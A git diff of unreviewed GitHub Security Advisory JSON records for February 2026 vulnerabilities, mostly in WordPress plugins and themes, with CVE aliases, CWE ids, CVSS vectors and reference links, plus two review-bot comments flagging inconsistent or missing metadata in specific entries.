@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-crh6-h7h3-f48v", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69394" + ], + "details": "Authorization Bypass Through User-Controlled Key vulnerability in cnvrse Cnvrse cnvrse allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Cnvrse: from n/a through <= 026.02.10.20.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69394" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/cnvrse/vulnerability/wordpress-cnvrse-plugin-025-12-24-01-insecure-direct-object-references-idor-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cvjq-fp7r-7jf7/GHSA-cvjq-fp7r-7jf7.json b/advisories/unreviewed/2026/02/GHSA-cvjq-fp7r-7jf7/GHSA-cvjq-fp7r-7jf7.json new file mode 100644 index 0000000000000..7e3bc31d2acca --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cvjq-fp7r-7jf7/GHSA-cvjq-fp7r-7jf7.json 
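Review bot: The upper bound in `details` for GHSA-crh6-h7h3-f48v (`<= 026.02.10.20`) does not match the version in the Patchstack reference slug (`wordpress-cnvrse-plugin-025-12-24-01-...`), so the record as synced names two different last-affected versions. With `"affected": []` there is no machine-readable range to settle it, and tooling or a human keyed on either string could wrongly clear or flag an install. The bound should be confirmed against the upstream Patchstack entry before a range is written into `affected`.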
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cvjq-fp7r-7jf7", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68837" + ], + "details": "Missing Authorization vulnerability in ELEXtensions ELEX WordPress HelpDesk & Customer Ticketing System elex-helpdesk-customer-support-ticket-system allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ELEX WordPress HelpDesk & Customer Ticketing System: from n/a through <= 3.3.5.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68837" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/elex-helpdesk-customer-support-ticket-system/vulnerability/wordpress-elex-wordpress-helpdesk-customer-ticketing-system-plugin-3-3-5-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cvm5-m63f-8wmv/GHSA-cvm5-m63f-8wmv.json b/advisories/unreviewed/2026/02/GHSA-cvm5-m63f-8wmv/GHSA-cvm5-m63f-8wmv.json new file mode 100644 index 0000000000000..0c2b2327fbe4e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cvm5-m63f-8wmv/GHSA-cvm5-m63f-8wmv.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cvm5-m63f-8wmv", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68843" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bas Schuiling FeedWordPress Advanced Filters faf allows Reflected XSS.This issue affects FeedWordPress Advanced Filters: from n/a through <= 0.6.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68843" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/faf/vulnerability/wordpress-feedwordpress-advanced-filters-plugin-0-6-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f29p-m33v-73cj/GHSA-f29p-m33v-73cj.json b/advisories/unreviewed/2026/02/GHSA-f29p-m33v-73cj/GHSA-f29p-m33v-73cj.json new file mode 100644 index 0000000000000..76513e81ddd5a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f29p-m33v-73cj/GHSA-f29p-m33v-73cj.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f29p-m33v-73cj", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68541" + ], + "details": "Deserialization of Untrusted Data vulnerability in BoldThemes Ippsum ippsum allows Object Injection.This issue affects Ippsum: from n/a through <= 1.2.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68541" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/ippsum/vulnerability/wordpress-ippsum-theme-1-2-0-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f3xp-j3c9-999x/GHSA-f3xp-j3c9-999x.json b/advisories/unreviewed/2026/02/GHSA-f3xp-j3c9-999x/GHSA-f3xp-j3c9-999x.json new file mode 100644 index 0000000000000..34a429cf89198 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f3xp-j3c9-999x/GHSA-f3xp-j3c9-999x.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f3xp-j3c9-999x", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67988" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in LoftOcean CozyStay cozystay allows PHP Local File Inclusion.This issue affects CozyStay: from n/a through < 1.9.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67988" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/cozystay/vulnerability/wordpress-cozystay-theme-1-9-1-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f647-638r-hxrw/GHSA-f647-638r-hxrw.json b/advisories/unreviewed/2026/02/GHSA-f647-638r-hxrw/GHSA-f647-638r-hxrw.json index 27cefef99b1d5..6928ccfaf97bf 100644 --- a/advisories/unreviewed/2026/02/GHSA-f647-638r-hxrw/GHSA-f647-638r-hxrw.json +++ b/advisories/unreviewed/2026/02/GHSA-f647-638r-hxrw/GHSA-f647-638r-hxrw.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-f647-638r-hxrw", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25330" ], "details": "Missing Authorization vulnerability in PublishPress PublishPress Authors publishpress-authors allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PublishPress Authors: from n/a through <= 4.10.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { 
@@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:17Z" diff --git a/advisories/unreviewed/2026/02/GHSA-f6p8-2gf3-784r/GHSA-f6p8-2gf3-784r.json b/advisories/unreviewed/2026/02/GHSA-f6p8-2gf3-784r/GHSA-f6p8-2gf3-784r.json new file mode 100644 index 0000000000000..45d14242b9829 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f6p8-2gf3-784r/GHSA-f6p8-2gf3-784r.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f6p8-2gf3-784r", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2025-60087" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Nenad Obradovic Extensive VC Addons for WPBakery page builder extensive-vc-addon allows PHP Local File Inclusion.This issue affects Extensive VC Addons for WPBakery page builder: from n/a through <= 1.9.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60087" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/extensive-vc-addon/vulnerability/wordpress-extensive-vc-addons-for-wpbakery-page-builder-plugin-1-9-1-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f6pr-2mv6-45fq/GHSA-f6pr-2mv6-45fq.json b/advisories/unreviewed/2026/02/GHSA-f6pr-2mv6-45fq/GHSA-f6pr-2mv6-45fq.json new file mode 100644 index 0000000000000..eb47df052da3f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f6pr-2mv6-45fq/GHSA-f6pr-2mv6-45fq.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f6pr-2mv6-45fq", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68846" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Paris Holley Asynchronous Javascript asynchronous-javascript allows Reflected XSS.This issue affects Asynchronous Javascript: from n/a through <= 1.3.5.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68846" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/asynchronous-javascript/vulnerability/wordpress-asynchronous-javascript-plugin-1-3-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f8c9-f59w-g5cx/GHSA-f8c9-f59w-g5cx.json b/advisories/unreviewed/2026/02/GHSA-f8c9-f59w-g5cx/GHSA-f8c9-f59w-g5cx.json new file mode 100644 index 0000000000000..3932b3ec69763 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f8c9-f59w-g5cx/GHSA-f8c9-f59w-g5cx.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f8c9-f59w-g5cx", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68862" + ], + "details": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Murtaza Bhurgri Woo File Dropzone woo-file-dropzone allows Path Traversal.This issue affects Woo File Dropzone: from n/a through <= 1.1.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68862" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/woo-file-dropzone/vulnerability/wordpress-woo-file-dropzone-plugin-1-1-7-arbitrary-file-deletion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fc39-6hhj-gr5p/GHSA-fc39-6hhj-gr5p.json b/advisories/unreviewed/2026/02/GHSA-fc39-6hhj-gr5p/GHSA-fc39-6hhj-gr5p.json new file mode 100644 index 0000000000000..fe2cdcbe77e28 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fc39-6hhj-gr5p/GHSA-fc39-6hhj-gr5p.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fc39-6hhj-gr5p", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67971" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPManageNinja FluentCart fluent-cart allows Reflected XSS.This issue affects FluentCart: from n/a through < 1.3.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67971" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/fluent-cart/vulnerability/wordpress-fluentcart-plugin-1-3-0-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fg97-672q-6chv/GHSA-fg97-672q-6chv.json b/advisories/unreviewed/2026/02/GHSA-fg97-672q-6chv/GHSA-fg97-672q-6chv.json new file mode 100644 index 0000000000000..2bfd89a27a894 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fg97-672q-6chv/GHSA-fg97-672q-6chv.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fg97-672q-6chv", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-69298" + ], + "details": "Missing Authorization vulnerability in GhostPool Gauge gauge allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Gauge: from n/a through <= 6.56.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69298" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/gauge/vulnerability/wordpress-gauge-theme-6-56-4-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fqrw-hvqv-r58w/GHSA-fqrw-hvqv-r58w.json b/advisories/unreviewed/2026/02/GHSA-fqrw-hvqv-r58w/GHSA-fqrw-hvqv-r58w.json new file mode 100644 index 0000000000000..7ef6368fe1d80 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fqrw-hvqv-r58w/GHSA-fqrw-hvqv-r58w.json 
@@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fqrw-hvqv-r58w", + "modified": "2026-02-20T18:31:40Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26745" + ], + "details": "OpenSourcePOS 3.4.1 has a second order SQL Injection vulnerability in the handling of the currency_symbol configuration field. Although the input is initially stored without immediate execution, it is later concatenated into a dynamically constructed SQL query without proper sanitization or parameter binding. This allows an attacker with access to modify the currency_symbol value to inject arbitrary SQL expressions, which are executed when the affected query is subsequently processed.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26745" + }, + { + "type": "WEB", + "url": "https://github.com/hungnqdz/cve-research/blob/main/CVE-2026-26745.md" + }, + { + "type": "WEB", + "url": "https://github.com/opensourcepos/opensourcepos" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g3qj-5j85-8w2c/GHSA-g3qj-5j85-8w2c.json b/advisories/unreviewed/2026/02/GHSA-g3qj-5j85-8w2c/GHSA-g3qj-5j85-8w2c.json new file mode 100644 index 0000000000000..df9d8756a17e9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g3qj-5j85-8w2c/GHSA-g3qj-5j85-8w2c.json 
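Review bot: `"cwe_ids": []` leaves GHSA-fqrw-hvqv-r58w unclassified even though `details` describes a second-order SQL injection through the `currency_symbol` configuration field; `"cwe_ids": ["CWE-89"]` would match the text. Both `severity` fields are also empty and `affected` is `[]`, so filters keyed on CWE, severity or package will not surface this advisory. The empty values presumably mirror the NVD record at sync time, and should be filled in when the advisory is reviewed.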
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g3qj-5j85-8w2c", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2025-53228" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jezza101 bbpress Simple Advert Units bbpress-simple-advert-units allows Reflected XSS.This issue affects bbpress Simple Advert Units: from n/a through <= 0.41.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53228" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/bbpress-simple-advert-units/vulnerability/wordpress-bbpress-simple-advert-units-plugin-0-41-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g5wr-mqvx-5c3v/GHSA-g5wr-mqvx-5c3v.json b/advisories/unreviewed/2026/02/GHSA-g5wr-mqvx-5c3v/GHSA-g5wr-mqvx-5c3v.json new file mode 100644 index 0000000000000..28c2bb9792dcb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g5wr-mqvx-5c3v/GHSA-g5wr-mqvx-5c3v.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g5wr-mqvx-5c3v", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68042" + ], + "details": "Missing Authorization vulnerability in Travelpayouts Travelpayouts travelpayouts allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Travelpayouts: from n/a through <= 1.2.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68042" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/travelpayouts/vulnerability/wordpress-travelpayouts-plugin-1-2-1-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gcfc-fjf7-2pj9/GHSA-gcfc-fjf7-2pj9.json b/advisories/unreviewed/2026/02/GHSA-gcfc-fjf7-2pj9/GHSA-gcfc-fjf7-2pj9.json new file mode 100644 index 0000000000000..d53f5c055eab5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gcfc-fjf7-2pj9/GHSA-gcfc-fjf7-2pj9.json 
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gcfc-fjf7-2pj9", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26097" + ], + "details": "Uncontrolled Search Path Element in Owl opds 2.2.0.4 allows Leveraging/Manipulating Configuration File Search Paths via a crafted network request.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26097" + }, + { + "type": "WEB", + "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-26097" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gfrr-w669-mfpw/GHSA-gfrr-w669-mfpw.json b/advisories/unreviewed/2026/02/GHSA-gfrr-w669-mfpw/GHSA-gfrr-w669-mfpw.json new file mode 100644 index 0000000000000..71ec755e47357 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gfrr-w669-mfpw/GHSA-gfrr-w669-mfpw.json 
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gfrr-w669-mfpw",
+ "modified": "2026-02-20T18:31:40Z",
+ "published": "2026-02-20T18:31:39Z",
+ "aliases": [
+ "CVE-2026-27504"
+ ],
+ "details": "SVXportal version 2.5 and prior contain a reflected cross-site scripting vulnerability in radiomobile_front.php via the stationid query parameter. When an authenticated administrator views a crafted URL, the application embeds the unsanitized parameter value into a hidden input value field, allowing attacker-supplied script injection and execution in the administrator's browser. This can be used to compromise admin sessions or perform unauthorized actions via the administrator's authenticated context.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27504"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/sa2blv/SVXportal/blob/master/radiomobile_front.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/svxportal-radiomobile-front-php-stationid-reflected-xss"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T17:25:57Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-gj5f-4c2g-54hq/GHSA-gj5f-4c2g-54hq.json b/advisories/unreviewed/2026/02/GHSA-gj5f-4c2g-54hq/GHSA-gj5f-4c2g-54hq.json
new file mode 100644
index 0000000000000..694d911126ff6
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-gj5f-4c2g-54hq/GHSA-gj5f-4c2g-54hq.json
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gj5f-4c2g-54hq",
+ "modified": "2026-02-20T18:31:40Z",
+ "published": "2026-02-20T18:31:40Z",
+ "aliases": [
+ "CVE-2026-2850"
+ ],
+ "details": "A vulnerability was found in yeqifu warehouse up to aaf29962ba407d22d991781de28796ee7b4670e4. This affects the function addCustomer/updateCustomer/deleteCustomer of the file dataset\\repos\\warehouse\\src\\main\\java\\com\\yeqifu\\bus\\controller\\CustomerController.java of the component Customer Endpoint. Performing a manipulation results in improper access controls. Remote exploitation of the attack is possible. The exploit has been made public and could be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The project was informed of the problem early through an issue report but has not responded yet.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2850"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/yeqifu/warehouse/issues/61"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/yeqifu/warehouse/issues/61#issue-3846669982"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/yeqifu/warehouse"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347086"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347086"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754429"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-266"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T18:25:53Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-gmmc-3vpq-7m4c/GHSA-gmmc-3vpq-7m4c.json b/advisories/unreviewed/2026/02/GHSA-gmmc-3vpq-7m4c/GHSA-gmmc-3vpq-7m4c.json
new file mode 100644
index 0000000000000..9383fb52f68b9
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-gmmc-3vpq-7m4c/GHSA-gmmc-3vpq-7m4c.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gmmc-3vpq-7m4c",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2026-22366"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Jude jude allows PHP Local File Inclusion.This issue affects Jude: from n/a through <= 1.3.0.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22366"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/jude/vulnerability/wordpress-jude-theme-1-3-0-local-file-inclusion-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:35Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-gpx9-88hq-9x47/GHSA-gpx9-88hq-9x47.json b/advisories/unreviewed/2026/02/GHSA-gpx9-88hq-9x47/GHSA-gpx9-88hq-9x47.json
new file mode 100644
index 0000000000000..7bbd35202aeba
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-gpx9-88hq-9x47/GHSA-gpx9-88hq-9x47.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gpx9-88hq-9x47",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:36Z",
+ "aliases": [
+ "CVE-2025-69379"
+ ],
+ "details": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in vanquish Upload Files Anywhere wp-upload-files-anywhere allows Path Traversal.This issue affects Upload Files Anywhere: from n/a through <= 2.8.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69379"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/wp-upload-files-anywhere/vulnerability/wordpress-upload-files-anywhere-plugin-2-8-arbitrary-file-deletion-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:22Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-gq95-fxhv-hvcp/GHSA-gq95-fxhv-hvcp.json b/advisories/unreviewed/2026/02/GHSA-gq95-fxhv-hvcp/GHSA-gq95-fxhv-hvcp.json
index 7f4d9ff2f26dc..426bddaaaa21a 100644
